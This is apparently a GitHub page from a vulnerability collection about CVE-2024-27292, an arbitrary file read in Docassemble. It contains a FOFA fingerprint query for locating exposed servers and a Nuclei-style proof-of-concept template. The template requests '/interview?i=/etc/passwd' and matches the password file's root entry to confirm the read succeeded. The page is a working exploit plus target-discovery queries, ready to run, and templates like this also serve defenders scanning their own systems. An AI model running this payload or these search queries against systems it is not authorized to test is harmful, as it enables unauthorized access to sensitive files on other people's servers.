Skip to content

Latest commit

 

History

History
51 lines (43 loc) · 1.14 KB

Docassemble任意文件读取漏洞(CVE-2024-27292).md

File metadata and controls

51 lines (43 loc) · 1.14 KB

fofa

icon_hash="-575790689"

poc

id: CVE-2024-27292

info:
name:Docassemble-LocalFileInclusion
author:johnk3r
severity:high
description:|
    Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch.
reference:
-https://tantosec.com/blog/docassemble/
-https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv
-https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9
classification:
cvss-metrics:CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score:7.5
cve-id:CVE-2024-27292
cwe-id:CWE-706
epss-score:0.00043
epss-percentile:0.0866
metadata:
verified:true
max-request:1
shodan-query:http.title:"docassemble"
fofa-query:icon_hash="-575790689"
tags:cve,cve2024,docassemble,lfi

http:
-method:GET
path:
-"{{BaseURL}}/interview?i=/etc/passwd"

matchers-condition:and
matchers:
-type:regex
regex:
-"root:.*:0:0:"

-type:status
status:
- 501